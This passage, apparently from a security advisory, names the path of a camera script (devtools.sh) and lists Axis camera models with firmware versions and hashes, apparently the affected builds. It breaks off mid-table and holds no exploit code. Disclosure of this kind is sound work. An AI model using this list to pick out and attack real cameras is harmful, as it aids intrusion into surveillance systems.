The script can be found on directory:\n\"{HTMLROOT}/bin/devtools.sh\".\n\n========================================================================\nPRODUCT FIRMWARE FIRMWARE HASH\n========================================================================\nAXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a\nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d\nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10\nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921\nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7\nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e\nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a\nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65\nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811\nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e\nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70\nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7\nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b\nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6\nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d\nAXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca\nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509\nAXIS M3113-R 5.40.9.4 
8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7\nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979\nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939\nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969\nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb\nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03\nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad\nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f\nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d\nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6\nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af\nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba\nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c\nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea\nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474\nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\nAXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56\nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a\nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532\nAXIS P3344 5.40.9.8 
dd752099f8b2c48b91914ec32484f532\nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476\nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864\nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b\nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e\nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e\nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2\nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00\nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d\nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892\nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc\nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749\nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271\nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8\nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727\nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106\nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0\nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698\nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611\nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf\nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52\nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e\nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313\nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188\nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81\nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863\nAXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9\nAXIS Q1765-LE 
5.90.1.1 7930bf5c4c947f2f948f8b7475f01409\nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1\nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83\nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0\nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd\nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4\nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49\nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9\nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1\nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e\nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688\nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d\nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660\nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3\nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de\nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104\nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506\nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b\nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47\nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb\nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026\nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d\nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53\nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253\nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766\nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da\nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501\nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd\nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1\nAXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d\nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928\nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d\nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce\nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6\nAXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea\nAXIS Q6045-E 5.70.1.2 
321a5d906863787fdc5e34483e6ec2a8\nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d\nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741\nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746\nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b\nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148\nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5\nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f\nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5\nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d\nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0\nAXIS Q7406 5.51.2 3cdb7935278157b9c91c33